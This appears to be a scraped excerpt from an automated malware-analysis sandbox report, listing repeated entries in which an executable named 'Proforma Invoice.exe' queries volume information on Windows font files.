Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
